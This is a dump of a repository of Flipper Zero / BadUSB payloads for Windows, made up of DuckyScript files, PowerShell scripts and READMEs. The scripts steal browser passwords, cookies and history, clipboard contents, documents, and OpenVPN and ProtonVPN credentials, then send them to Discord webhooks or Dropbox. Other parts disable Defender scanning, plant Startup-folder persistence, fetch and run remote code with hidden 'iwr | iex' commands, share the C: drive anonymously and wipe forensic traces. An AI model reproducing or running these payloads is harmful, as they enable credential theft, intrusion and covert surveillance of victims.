
## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby) * [Exe Author](https://github.com/moonD4rk/HackBrowserData)

(back to top)

================================================ FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/b.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp # Download the exe and save it to temp directory iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe" # Execute the Browser Stealer cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait # Exfiltrate the loot to discord Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip Upload-Discord -file "$env:tmp\browserdata.zip" ================================================ FILE: FlipperZero/payloads/Browser-Devil/Browser-Devil/payload.txt ================================================ REM Title: Browser-Devil REM Author: atomiczsec REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers REM Target: Windows 10 DELAY 2000 GUI r DELAY 1000 STRING powershell saps powershell -verb runas ENTER DELAY 1000 ALT y DELAY 1000 STRING iwr https:// < Your Shared link for the intended file> ?dl=1 | iex ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly ================================================ FILE: FlipperZero/payloads/Copy-And-Waste/I.bat ================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: FlipperZero/payloads/Copy-And-Waste/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Copy-And-Waste A payload to exfiltrate clipboard contents ## Description This payload uses iwr to download 2 files * I.bat * c.ps1 **I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup **c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click Then the contents will then be sent to the discord webhook for viewing pleasure For killing the script press both Ctrl buttons at the same time [It will resume at reboot] ## Getting Started ### Dependencies * Pastebin or other file sharing service, Discord webhook or other webhook service * Windows 10,11 * [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

(back to top)

### Executing program * Plug in your device * Device will download both files and place them in proper directories to then run the script ``` powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Copy-And-Waste/c.ps1 ================================================ Add-Type -AssemblyName WindowsBase Add-Type -AssemblyName PresentationCore function dischat { [CmdletBinding()] param ( [Parameter (Position=0,Mandatory = $True)] [string]$con ) $hookUrl = 'YOUR DISCORD WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $con } Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body } dischat (get-clipboard) while (1){ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl) $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c) $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x) if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)} elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit} else {continue} } ================================================ FILE: FlipperZero/payloads/Copy-And-Waste/payload.txt ================================================ REM Title: Copy-And-Waste REM Author: atomiczsec & I am Jakoby REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: FlipperZero/payloads/Copy-And-Waste/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/De-Bloater/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Water-UnMark A payload to get rid of the ugly windows activation watermark. ## Description This script will get rid of the ugly windows watermark. This script will automatically reboot the device. This is not activating your computer!! ## Getting Started ### Dependencies * Unactivated Windows 10

(back to top)

### Executing program * Plug in your device ``` Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\svsvc" -Name Start -Value 4 -Force ```

(back to top)

## Contributing All contributors names will be listed here: [atomiczsec](https://github.com/atomiczsec)

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/De-Bloater/placeholder ================================================ ================================================ FILE: FlipperZero/payloads/Doc-Hog/d.ps1 ================================================ function Doc-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse $types = @{ "*.docx" = "Word"; "*.doc" = "Word"; "*.pptx" = "PowerPoint"; "*.xlsx" = "Excel"; "*.pdf" = "PDF"; "*.jpeg" = "JPEG"; "*.png" = "PNG"; "*.jpg" = "JPEG"; "*.csv" = "CSV"; "*.txt" = "Text"; } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object {$_.Name -like $type} if ($filteredFiles) { $zipFile = "$env:TEMP\$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } ================================================ FILE: FlipperZero/payloads/Doc-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Doc-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Doc-Hog A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV ## Description This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact
Link

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/History-Pig/HP.ps1 ================================================ #History-Pig # See if file is a thing Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Chrome History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Edge History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Edge History to Temp Directory to get sent to Dropbox else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: FlipperZero/payloads/History-Pig/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# History-Pig A payload to exfiltrate the history of the 2 most popular browsers ## Description This payload will enumerate through the browser directories, looking for the file that stores the history These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/History-Pig/payload.txt ================================================ REM Title: History-Pig REM Author: atomiczsec REM Description: This payload is meant to exfiltrate browsers history to a dropbox REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/OVPN-Hog/o.ps1 ================================================ function OVPN-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Drive = "C:" $Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse if ($Files) { $types = @{ "*.ovpn" = "OpenVPN" } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object { $_.Name -like $type } if ($filteredFiles) { $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } } ================================================ FILE: FlipperZero/payloads/OVPN-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < URL HERE > dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/OVPN-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# OVPN-Hog A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn). ## Description This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact
Link

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Powershell-History/PH.ps1 ================================================ #Powershell-History # See if file is a thing Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) { try { Write-Host "The Powershell History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Powershell History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt" Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: FlipperZero/payloads/Powershell-History/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Powershell-History A payload to exfiltrate the history of the powershell console ## Description This payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console These files will be saved to the temp directory Finally dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Powershell-History/payload.txt ================================================ REM Title: Powershell-History REM Author: atomiczsec REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Printer-Recon/PR.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } function Clean-Exfil { # empty temp folder rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue # delete run box history reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f # Delete powershell history Remove-Item (Get-PSreadlineOption).HistorySavePath # Empty recycle bin Clear-RecycleBin -Force -ErrorAction SilentlyContinue } $F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 DropBox-Upload -f $F1 Clean-Exfil ================================================ FILE: FlipperZero/payloads/Printer-Recon/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon ## Description This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Printer-Recon/payload.txt ================================================ REM Title: Printer-Recon REM Author: atomiczsec REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Priv-Paths/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Printer-Recon ## Description A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. ## Getting Started ### Dependencies * Discord Webhook or other service that uses webhooks * Windows 10

(back to top)

### Executing program * Plug in your device * Command will be entered in the command prompt to search for unqouted service paths so you can later exploit them for priv esc ``` wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Priv-Paths/payload.txt ================================================ REM Title: Priv-Paths REM Author: atomiczsec REM Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook. REM Target: Windows 10 REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky DELAY 3000 GUI r DELAY 1000 STRING cmd ENTER DELAY 500 STRING cd %HOMEPATH% ENTER DELAY 1000 STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt ENTER DELAY 1000 STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt" YOUR-DISCORD-WEBHOOK ENTER DELAY 200 STRING del p.txt ENTER DELAY 100 STRING exit ENTER ================================================ FILE: FlipperZero/payloads/Proton-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Proton-Hog A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. ## Description This payload will enumerate through the ProtonVPN directories, looking for the file that stores the userconfig file Then dropbox will be used to exfiltrate the files to cloud storage ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10,11

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Proton-Hog/payload.txt ================================================ REM Title: Proton-Hog REM Author: atomiczsec REM Description: A payload to exfiltrate the user config file of Proton VPN that contains keys and usernames as well as acount information. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/Proton-Hog/s.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } # Test the path to the ProtonVPN directory and if it is availible, change directory to where the user.config is stored if (-not(Test-Path "$env:USERPROFILE\AppData\Local\ProtonVPN")) { try { Write-Host "The VPN folder has not been found. " } catch { throw $_.Exception.Message } } else { $protonVpnPath = "$env:USERPROFILE\AppData\Local\ProtonVPN" cd $protonVpnPath Get-ChildItem | Where-Object {$_.name -Match "ProtonVPN.exe"} | cd Get-ChildItem | cd # Upload user.config to dropbox DropBox-Upload -f "user.config" } ================================================ FILE: FlipperZero/payloads/Pwn-Drive/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Pwn-Drive A payload to share the victims "C:" drive to the network. ## Description This payload will share the entire victims "C:" drive to the entire network for further exploitation. ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

## Acknowledgments * [Hak5](https://hak5.org/) * [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

(back to top)

================================================ FILE: FlipperZero/payloads/Pwn-Drive/c.ps1 ================================================ #Pwn-Drive #Enable Network Discovery netsh advfirewall firewall set rule group=”network discovery” new enable=yes #Enable File and Print netsh firewall set service type=fileandprint mode=enable profile=all #Setting Registry Values for allowing access to drive without credentials Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name everyoneincludesanonymous -Value 1 -Force Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters\" -Name restrictnullsessacces -Value 0 -Force #Sharing the Drive New-SmbShare -Name "Windows Update" -Path "C:\" ================================================ FILE: FlipperZero/payloads/Pwn-Drive/payload.txt ================================================ REM Title: Pwn-Drive REM Author: atomiczsec REM Description: This payload will share the entire victims "C:" drive to the entire network for further exploitation. REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: FlipperZero/payloads/RanFunWare/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# RanFunWare A payload to prank your friends into thinking their computer got hit with ransomware. ## Description This payload will hide all desktop icons, change the background, and have a message pop up (Fully Customizable) ## Getting Started ### Dependencies * DropBox or other file sharing service - Your Shared link for the intended file * Windows 10

(back to top)

### Executing program * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl ```

(back to top)

## Contributing All contributors names will be listed here atomiczsec I am Jakoby

(back to top)

## Version History * 0.1 * Initial Release

(back to top)

## Contact

📱 My Socials 📱

C#
YouTube 		Python
Twitter 		Jsonnet
I-Am-Jakoby's Discord

(back to top)

(back to top)

